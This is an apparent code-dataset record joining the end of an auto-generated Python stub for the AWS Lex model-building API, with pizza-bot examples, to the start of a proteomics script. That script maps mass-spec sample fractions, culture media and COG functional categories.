'contentType': 'PlainText',
},
{
'content': 'I cancelled your order.',
'contentType': 'PlainText',
},
],
},
sampleUtterances=[
'Order me a pizza.',
'Order me a {Type} pizza.',
'I want a {Crust} crust {Type} pizza',
'I want a {Crust} crust {Type} pizza with {Sauce} sauce.',
],
slots=[
{
'name': 'Type',
'description': 'The type of pizza to order.',
'priority': 1,
'sampleUtterances': [
'Get me a {Type} pizza.',
'A {Type} pizza please.',
'I'd like a {Type} pizza.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of pizza would you like?',
'contentType': 'PlainText',
},
{
'content': 'Vegie or cheese pizza?',
'contentType': 'PlainText',
},
{
'content': 'I can get you a vegie or a cheese pizza.',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Crust',
'description': 'The type of pizza crust to order.',
'priority': 2,
'sampleUtterances': [
'Make it a {Crust} crust.',
'I'd like a {Crust} crust.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaCrustType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of crust would you like?',
'contentType': 'PlainText',
},
{
'content': 'Thick or thin crust?',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Sauce',
'description': 'The type of sauce to use on the pizza.',
'priority': 3,
'sampleUtterances': [
'Make it {Sauce} sauce.',
'I'd like {Sauce} sauce.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaSauceType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'White or red sauce?',
'contentType': 'PlainText',
},
{
'content': 'Garlic or tomato sauce?',
'contentType': 'PlainText',
},
],
},
},
],
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizza',
'checksum': 'ca9bc13d-afc8-4706-bbaf-091f7a5935d6',
'conclusionStatement': {
'messages': [
{
'content': 'All right, I ordered you a {Crust} crust {Type} pizza with {Sauce} sauce.',
'contentType': 'PlainText',
},
{
'content': 'OK, your {Crust} crust {Type} pizza with {Sauce} sauce is on the way.',
'contentType': 'PlainText',
},
],
'responseCard': 'foo',
},
'confirmationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'Should I order your {Crust} crust {Type} pizza with {Sauce} sauce?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494359783.453,
'description': 'Order a pizza from a local pizzeria.',
'fulfillmentActivity': {
'type': 'ReturnIntent',
},
'lastUpdatedDate': 1494359783.453,
'rejectionStatement': {
'messages': [
{
'content': 'Ok, I'll cancel your order.',
'contentType': 'PlainText',
},
{
'content': 'I cancelled your order.',
'contentType': 'PlainText',
},
],
},
'sampleUtterances': [
'Order me a pizza.',
'Order me a {Type} pizza.',
'I want a {Crust} crust {Type} pizza',
'I want a {Crust} crust {Type} pizza with {Sauce} sauce.',
],
'slots': [
{
'name': 'Sauce',
'description': 'The type of sauce to use on the pizza.',
'priority': 3,
'sampleUtterances': [
'Make it {Sauce} sauce.',
'I'd like {Sauce} sauce.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaSauceType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'White or red sauce?',
'contentType': 'PlainText',
},
{
'content': 'Garlic or tomato sauce?',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Type',
'description': 'The type of pizza to order.',
'priority': 1,
'sampleUtterances': [
'Get me a {Type} pizza.',
'A {Type} pizza please.',
'I'd like a {Type} pizza.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of pizza would you like?',
'contentType': 'PlainText',
},
{
'content': 'Vegie or cheese pizza?',
'contentType': 'PlainText',
},
{
'content': 'I can get you a vegie or a cheese pizza.',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Crust',
'description': 'The type of pizza crust to order.',
'priority': 2,
'sampleUtterances': [
'Make it a {Crust} crust.',
'I'd like a {Crust} crust.',
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaCrustType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of crust would you like?',
'contentType': 'PlainText',
},
{
'content': 'Thick or thin crust?',
'contentType': 'PlainText',
},
],
},
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'createVersion': True|False
}
:returns:
A confirmation prompt to ask the user to confirm an intent. For example, "Shall I order your pizza?"
A conclusion statement to send to the user after the intent has been fulfilled. For example, "I placed your pizza order."
A follow-up prompt that asks the user for additional activity. For example, asking "Do you want to order a drink with your pizza?"
"""
pass
def put_slot_type(name=None, description=None, enumerationValues=None, checksum=None, valueSelectionStrategy=None, createVersion=None, parentSlotTypeSignature=None, slotTypeConfigurations=None):
"""
Creates a custom slot type or replaces an existing custom slot type.
To create a custom slot type, specify a name for the slot type and a set of enumeration values, which are the values that a slot of this type can assume. For more information, see how-it-works .
If you specify the name of an existing slot type, the fields in the request replace the existing values in the $LATEST version of the slot type. Amazon Lex removes the fields that you don\'t provide in the request. If you don\'t specify required fields, Amazon Lex throws an exception. When you update the $LATEST version of a slot type, if a bot uses the $LATEST version of an intent that contains the slot type, the bot\'s status field is set to NOT_BUILT .
This operation requires permissions for the lex:PutSlotType action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to create a slot type that describes pizza sauces.
Expected Output:
:example: response = client.put_slot_type(
name='string',
description='string',
enumerationValues=[
{
'value': 'string',
'synonyms': [
'string',
]
},
],
checksum='string',
valueSelectionStrategy='ORIGINAL_VALUE'|'TOP_RESOLUTION',
createVersion=True|False,
parentSlotTypeSignature='string',
slotTypeConfigurations=[
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
)
:type name: string
:param name: [REQUIRED]\nThe name of the slot type. The name is not case sensitive.\nThe name can\'t match a built-in slot type name, or a built-in slot type name with 'AMAZON.' removed. For example, because there is a built-in slot type called AMAZON.DATE , you can\'t create a custom slot type called DATE .\nFor a list of built-in slot types, see Slot Type Reference in the Alexa Skills Kit .\n
:type description: string
:param description: A description of the slot type.
:type enumerationValues: list
:param enumerationValues: A list of EnumerationValue objects that defines the values that the slot type can take. Each value can have a list of synonyms , which are additional values that help train the machine learning model about the values that it resolves for a slot.\nWhen Amazon Lex resolves a slot value, it generates a resolution list that contains up to five possible values for the slot. If you are using a Lambda function, this resolution list is passed to the function. If you are not using a Lambda function you can choose to return the value that the user entered or the first value in the resolution list as the slot value. The valueSelectionStrategy field indicates the option to use.\n\n(dict) --Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.\nFor example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values\n\nthick\nthin\nstuffed\n\n\nvalue (string) -- [REQUIRED]The value of the slot type.\n\nsynonyms (list) --Additional values related to the slot type value.\n\n(string) --\n\n\n\n\n\n
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new slot type, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update a slot type, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type valueSelectionStrategy: string
:param valueSelectionStrategy: Determines the slot resolution strategy that Amazon Lex uses to return slot type values. The field can be set to one of the following values:\n\nORIGINAL_VALUE - Returns the value entered by the user, if the user value is similar to the slot value.\nTOP_RESOLUTION - If there is a resolution list for the slot, return the first value in the resolution list as the slot type value. If there is no resolution list, null is returned.\n\nIf you don\'t specify the valueSelectionStrategy , the default is ORIGINAL_VALUE .\n
:type createVersion: boolean
:param createVersion: When set to true a new numbered version of the slot type is created. This is the same as calling the CreateSlotTypeVersion operation. If you do not specify createVersion , the default is false .
:type parentSlotTypeSignature: string
:param parentSlotTypeSignature: The built-in slot type used as the parent of the slot type. When you define a parent slot type, the new slot type has all of the same configuration as the parent.\nOnly AMAZON.AlphaNumeric is supported.\n
:type slotTypeConfigurations: list
:param slotTypeConfigurations: Configuration information that extends the parent built-in slot type. The configuration is added to the settings for the parent slot type.\n\n(dict) --Provides configuration information for a slot type.\n\nregexConfiguration (dict) --A regular expression used to validate the value of a slot.\n\npattern (string) -- [REQUIRED]A regular expression used to validate the value of a slot.\nUse a standard regular expression. Amazon Lex supports the following characters in the regular expression:\n\nA-Z, a-z\n0-9\nUnicode characters ('u<Unicode>')\n\nRepresent Unicode characters with four digits, for example 'u0041' or 'u005A'.\nThe following regular expression operators are not supported:\n\nInfinite repeaters: *, +, or {x,} with no upper bound.\nWild card (.)\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'createVersion': True|False,
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
Response Structure
(dict) --
name (string) --
The name of the slot type.
description (string) --
A description of the slot type.
enumerationValues (list) --
A list of EnumerationValue objects that defines the values that the slot type can take.
(dict) --
Each slot type can have a set of values. Each enumeration value represents a value the slot type can take.
For example, a pizza ordering bot could have a slot type that specifies the type of crust that the pizza should have. The slot type could include the values
thick
thin
stuffed
value (string) --
The value of the slot type.
synonyms (list) --
Additional values related to the slot type value.
(string) --
lastUpdatedDate (datetime) --
The date that the slot type was updated. When you create a slot type, the creation date and last update date are the same.
createdDate (datetime) --
The date that the slot type was created.
version (string) --
The version of the slot type. For a new slot type, the version is always $LATEST .
checksum (string) --
Checksum of the $LATEST version of the slot type.
valueSelectionStrategy (string) --
The slot resolution strategy that Amazon Lex uses to determine the value of the slot. For more information, see PutSlotType .
createVersion (boolean) --
True if a new version of the slot type was created. If the createVersion field was not specified in the request, the createVersion field is set to false in the response.
parentSlotTypeSignature (string) --
The built-in slot type used as the parent of the slot type.
slotTypeConfigurations (list) --
Configuration information that extends the parent built-in slot type.
(dict) --
Provides configuration information for a slot type.
regexConfiguration (dict) --
A regular expression used to validate the value of a slot.
pattern (string) --
A regular expression used to validate the value of a slot.
Use a standard regular expression. Amazon Lex supports the following characters in the regular expression:
A-Z, a-z
0-9
Unicode characters ("u<Unicode>")
Represent Unicode characters with four digits, for example "u0041" or "u005A".
The following regular expression operators are not supported:
Infinite repeaters: *, +, or {x,} with no upper bound.
Wild card (.)
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
Examples
This example shows how to create a slot type that describes pizza sauces.
response = client.put_slot_type(
name='PizzaSauceType',
description='Available pizza sauces',
enumerationValues=[
{
'value': 'red',
},
{
'value': 'white',
},
],
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocPizzaSauceType',
'checksum': 'cfd00ed1-775d-4357-947c-aca7e73b44ba',
'createdDate': 1494356442.23,
'description': 'Available pizza sauces',
'enumerationValues': [
{
'value': 'red',
},
{
'value': 'white',
},
],
'lastUpdatedDate': 1494356442.23,
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'enumerationValues': [
{
'value': 'string',
'synonyms': [
'string',
]
},
],
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'valueSelectionStrategy': 'ORIGINAL_VALUE'|'TOP_RESOLUTION',
'createVersion': True|False,
'parentSlotTypeSignature': 'string',
'slotTypeConfigurations': [
{
'regexConfiguration': {
'pattern': 'string'
}
},
]
}
:returns:
thick
thin
stuffed
"""
pass
def start_import(payload=None, resourceType=None, mergeStrategy=None, tags=None):
"""
Starts a job to import a resource to Amazon Lex.
See also: AWS API Documentation
Exceptions
:example: response = client.start_import(
payload=b'bytes',
resourceType='BOT'|'INTENT'|'SLOT_TYPE',
mergeStrategy='OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type payload: bytes
:param payload: [REQUIRED]\nA zip archive in binary format. The archive should contain one file, a JSON file containing the resource to import. The resource should match the type specified in the resourceType field.\n
:type resourceType: string
:param resourceType: [REQUIRED]\nSpecifies the type of resource to export. Each resource also exports any resources that it depends on.\n\nA bot exports dependent intents.\nAn intent exports dependent slot types.\n\n
:type mergeStrategy: string
:param mergeStrategy: [REQUIRED]\nSpecifies the action that the StartImport operation should take when there is an existing resource with the same name.\n\nFAIL_ON_CONFLICT - The import operation is stopped on the first conflict between a resource in the import file and an existing resource. The name of the resource causing the conflict is in the failureReason field of the response to the GetImport operation. OVERWRITE_LATEST - The import operation proceeds even if there is a conflict with an existing resource. The $LASTEST version of the existing resource is overwritten with the data from the import file.\n\n
:type tags: list
:param tags: A list of tags to add to the imported bot. You can only add tags when you import a bot, you can\'t add tags to an intent or slot type.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'createdDate': datetime(2015, 1, 1)
}
Response Structure
(dict) --
name (string) --
The name given to the import job.
resourceType (string) --
The type of resource to import.
mergeStrategy (string) --
The action to take when there is a merge conflict.
importId (string) --
The identifier for the specific import job.
importStatus (string) --
The status of the import job. If the status is FAILED , you can get the reason for the failure using the GetImport operation.
tags (list) --
A list of tags added to the imported bot.
(dict) --
A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --
The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --
The value associated with a key. The value may be an empty string but it can\'t be null.
createdDate (datetime) --
A timestamp for the date and time that the import job was requested.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'resourceType': 'BOT'|'INTENT'|'SLOT_TYPE',
'mergeStrategy': 'OVERWRITE_LATEST'|'FAIL_ON_CONFLICT',
'importId': 'string',
'importStatus': 'IN_PROGRESS'|'COMPLETE'|'FAILED',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'createdDate': datetime(2015, 1, 1)
}
:returns:
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def tag_resource(resourceArn=None, tags=None):
"""
Adds the specified tags to the specified resource. If a tag key already exists, the existing value is replaced with the new value.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
resourceArn='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type resourceArn: string
:param resourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the bot, bot alias, or bot channel to tag.\n
:type tags: list
:param tags: [REQUIRED]\nA list of tag keys to add to the resource. If a tag key already exists, the existing value is replaced with the new value.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.LimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(resourceArn=None, tagKeys=None):
"""
Removes tags from a bot, bot alias or bot channel.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
resourceArn='string',
tagKeys=[
'string',
]
)
:type resourceArn: string
:param resourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to remove the tags from.\n
:type tagKeys: list
:param tagKeys: [REQUIRED]\nA list of tag keys to remove from the resource. If a tag key does not exist on the resource, it is ignored.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.LimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
| 35.083457 | 2,831 | 0.655237 | 27,837 | 236,252 | 5.549736 | 0.04203 | 0.012687 | 0.053519 | 0.007612 | 0.856707 | 0.838428 | 0.823022 | 0.802244 | 0.790858 | 0.77784 | 0 | 0.008483 | 0.260053 | 236,252 | 6,733 | 2,832 | 35.088668 | 0.875245 | 0.979979 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.5 | 0.023256 | 0 | 0.523256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
cb19ebe29c5ceb794cf2373f2b9d82c85d3f65e7 | 8,862 | py | Python | src/mapping.py | vrrodovalho/evs-proteomics | 25163e6ff32f89ffc9969a873a43b2fb905a6e0c | [
"CC0-1.0"
] | null | null | null | src/mapping.py | vrrodovalho/evs-proteomics | 25163e6ff32f89ffc9969a873a43b2fb905a6e0c | [
"CC0-1.0"
] | null | null | null | src/mapping.py | vrrodovalho/evs-proteomics | 25163e6ff32f89ffc9969a873a43b2fb905a6e0c | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 29 03:28:55 2019
@author: rodovalhovr
"""
fractions_CR = {
'UF7':['20190524_18-053_1-1','20190524_18-053_1-2',
'20190524_18-053_2-1','20190524_18-053_2-2_suite',
'20190524_18-053_3-1','20190524_18-053_3-2'],
'UF8':['20190524_18-053_4-1','20190524_18-053_4-2',
'20190524_18-053_5-1','20190524_18-053_5-2',
'20190524_18-053_6-1','20190524_18-053_6-2'],
'UF9':['20190524_18-053_7-1','20190524_18-053_7-2',
'20190524_18-053_8-1','20190524_18-053_8-2',
'20190524_18-053_9-1','20190524_18-053_9-2'],
'YF7':['20190524_18-053_10-1','20190524_18-053_10-2',
'20190524_18-053_11-1','20190524_18-053-11-2',
'20190524_18-053_12-1','20190524_18-053_12-2'],
'YF8':['20190524_18-053_13-1','20190524_18-053_13-2',
'20190524_18-053_14-1','20190524_18-053_14-2',
'20190524_18-053_15-1','20190524_18-053_15-2'],
'YF9':['20190524_18-053_16-1','20190524_18-053_16-2',
'20190524_18-053_17-1','20190524_18-053_17-2',
'20190524_18-053_18-1','20190524_18-053_18-2'] }
fractions_CR = {
'UF7a' : ['20190524_18-053_1-1', '20190524_18-053_1-2'],
'UF7b' : ['20190524_18-053_2-1', '20190524_18-053_2-2_suite'],
'UF7c' : ['20190524_18-053_3-1', '20190524_18-053_3-2'],
'UF8a' : ['20190524_18-053_4-1', '20190524_18-053_4-2'],
'UF8b' : ['20190524_18-053_5-1', '20190524_18-053_5-2'],
'UF8c' : ['20190524_18-053_6-1', '20190524_18-053_6-2'],
'UF9a' : ['20190524_18-053_7-1', '20190524_18-053_7-2'],
'UF9b' : ['20190524_18-053_8-1', '20190524_18-053_8-2'],
'UF9c' : ['20190524_18-053_9-1', '20190524_18-053_9-2'],
'YF7a' : ['20190524_18-053_10-1', '20190524_18-053_10-2'],
'YF7b' : ['20190524_18-053_11-1', '20190524_18-053-11-2'],
'YF7c' : ['20190524_18-053_12-1', '20190524_18-053_12-2'],
'YF8a' : ['20190524_18-053_13-1', '20190524_18-053_13-2'],
'YF8b' : ['20190524_18-053_14-1', '20190524_18-053_14-2'],
'YF8c' : ['20190524_18-053_15-1', '20190524_18-053_15-2'],
'YF9a' : ['20190524_18-053_16-1', '20190524_18-053_16-2'],
'YF9b' : ['20190524_18-053_17-1', '20190524_18-053_17-2'],
'YF9c' : ['20190524_18-053_18-1', '20190524_18-053_18-2'] }
fractions_UC = {
'UF2':['20181107_18-053_1_1','20181107_18-053_1_2',
'20181107_18-053_1_3','20181107_18-053_1_4',
'20181107_18-053_2_1','20181107_18-053_2_2',
'20181107_18-053_2_3','20181107_18-053_2_4',
'20181107_18-053_3_1','20181107_18-053_3_2',
'20181107_18-053_3_3','20181107_18-053_3_4'],
'UF3':['20181107_18-053_4_1','20181107_18-053_4_2',
'20181107_18-053_4_3','20181107_18-053_4_4',
'20181107_18-053_5_1','20181107_18-053_5_2',
'20181107_18-053_5_3','20181107_18-053_5_4',
'20181107_18-053_6_1','20181107_18-053_6_2',
'20181107_18-053_6_3','20181107_18-053_6_4'],
'UF4':['20181107_18-053_7_1','20181107_18-053_7_2',
'20181107_18-053_7_3','20181107_18-053_7_4',
'20181107_18-053_8_1','20181107_18-053_8_2',
'20181107_18-053_8_3','20181107_18-053_8_4',
'20181107_18-053_9_1','20181107_18-053_9_2',
'20181107_18-053_9_3','20181107_18-053_9_4'],
'YF2':['20181107_18-053_10_1','20181107_18-053_10_2',
'20181107_18-053_10_3','20181107_18-053_10_4',
'20181107_18-053_11_1','20181107_18-053_11_2',
'20181107_18-053_11_3','20181107_18-053_11_4',
'20181107_18-053_12_1','20181107_18-053_12_2',
'20181107_18-053_12_3','20181107_18-053_12_4'],
'YF3':['20181107_18-053_13_1','20181107_18-053_13_2',
'20181107_18-053_13_3','20181107_18-053_13_4',
'20181107_18-053_14_1','20181107_18-053_14_2',
'20181107_18-053_14_3','20181107_18-053_14_4',
'20181107_18-053_15_1','20181107_18-053_15_2',
'20181107_18-053_15_3','20181107_18-053_15_4'],
'YF4':['20181107_18-053_16_1','20181107_18-053_16_2',
'20181107_18-053_16_3','20181107_18-053_16_4',
'20181107_18-053_17_1','20181107_18-053_17_2',
'20181107_18-053_17_3','20181107_18-053_17_4',
'20181107_18-053_18_1','20181107_18-053_18_2',
'20181107_18-053_18_3','20181107_18-053_18_4'] }
fractions_UC = {
'UF2a' : ['20181107_18-053_1_1','20181107_18-053_1_2',
'20181107_18-053_1_3','20181107_18-053_1_4'],
'UF2b' : ['20181107_18-053_2_1','20181107_18-053_2_2',
'20181107_18-053_2_3','20181107_18-053_2_4'],
'UF2c' : ['20181107_18-053_3_1','20181107_18-053_3_2',
'20181107_18-053_3_3','20181107_18-053_3_4'],
'UF3a' : ['20181107_18-053_4_1','20181107_18-053_4_2',
'20181107_18-053_4_3','20181107_18-053_4_4'],
'UF3b' : ['20181107_18-053_5_1','20181107_18-053_5_2',
'20181107_18-053_5_3','20181107_18-053_5_4'],
'UF3c' : ['20181107_18-053_6_1','20181107_18-053_6_2',
'20181107_18-053_6_3','20181107_18-053_6_4'],
'UF4a' : ['20181107_18-053_7_1','20181107_18-053_7_2',
'20181107_18-053_7_3','20181107_18-053_7_4'],
'UF4b' : ['20181107_18-053_8_1','20181107_18-053_8_2',
'20181107_18-053_8_3','20181107_18-053_8_4'],
'UF4c' : ['20181107_18-053_9_1','20181107_18-053_9_2',
'20181107_18-053_9_3','20181107_18-053_9_4'],
'YF2a' : ['20181107_18-053_10_1','20181107_18-053_10_2',
'20181107_18-053_10_3','20181107_18-053_10_4'],
'YF2b' : ['20181107_18-053_11_1','20181107_18-053_11_2',
'20181107_18-053_11_3','20181107_18-053_11_4'],
'YF2c' : ['20181107_18-053_12_1','20181107_18-053_12_2',
'20181107_18-053_12_3','20181107_18-053_12_4'],
'YF3a' : ['20181107_18-053_13_1','20181107_18-053_13_2',
'20181107_18-053_13_3','20181107_18-053_13_4'],
'YF3b' : ['20181107_18-053_14_1','20181107_18-053_14_2',
'20181107_18-053_14_3','20181107_18-053_14_4'],
'YF3c' : ['20181107_18-053_15_1','20181107_18-053_15_2',
'20181107_18-053_15_3','20181107_18-053_15_4'],
'YF4a' : ['20181107_18-053_16_1','20181107_18-053_16_2',
'20181107_18-053_16_3','20181107_18-053_16_4'],
'YF4b' : ['20181107_18-053_17_1','20181107_18-053_17_2',
'20181107_18-053_17_3','20181107_18-053_17_4'],
'YF4c' : ['20181107_18-053_18_1','20181107_18-053_18_2',
'20181107_18-053_18_3','20181107_18-053_18_4'] }
media_CR = {'UF':['UF7','UF8','UF9'], 'YEL':['YF7','YF8','YF9']}
media_UC = {'UF':['UF2','UF3','UF4'], 'YEL':['YF2','YF3','YF4']}
print_basic_parameters = {
'columns' : True,
'size' : True,
'empties' : True,
'duplicates' : True,
'check_columns' : ['query_name', 'Sequence', 'locus_tag']}
export_fasta_parameters = {
'output_file_name' : "PF129_EVs_CR_YEL-only.fasta",
'id_columns' : ["query_name","gi","emb","description",
"method","medium_UC", 'medium_CR'],
'seq_column' : 'Sequence',
'filters' : {'method': ['EVs-CR', 'EVs-CR/UC'],
'medium_CR' : ['YEL']}}
COGs = {
'A': 'A: RNA processing and modification',
'B': 'B: Chromatin structure and dynamics',
'C': 'C: Energy production and conversion',
'D': 'D: Cell cycle control, cell division, chromosome partitioning',
'E': 'E: Amino acid transport and metabolism',
'F': 'F: Nucleotide transport and metabolism',
'G': 'G: Carbohydrate transport and metabolism',
'H': 'H: Coenzyme transport and metabolism',
'I': 'I: Lipid transport and metabolism',
'J': 'J: Translation, ribosomal structure and biogenesis',
'K': 'K: Transcription',
'L': 'L: Replication, recombination and repair',
'M': 'M: Cell wall/membrane/envelope biogenesis',
'N': 'N: Cell motility',
'O': 'O: Post-translational modification, protein turnover, and chaperones',
'P': 'P: Inorganic ion transport and metabolism',
'Q': 'Q: Secondary metabolites biosynthesis, transport, and catabolism',
'T': 'T: Signal transduction mechanisms',
'U': 'U: Intracellular trafficking, secretion, and vesicular transport',
'V': 'V: Defense mechanisms',
'W': 'W: Extracellular structures',
'Y': 'Y: Nuclear structure',
'Z': 'Z: Cytoskeleton',
'R': 'R: General function prediction only',
'S': 'S: Function Unknown',
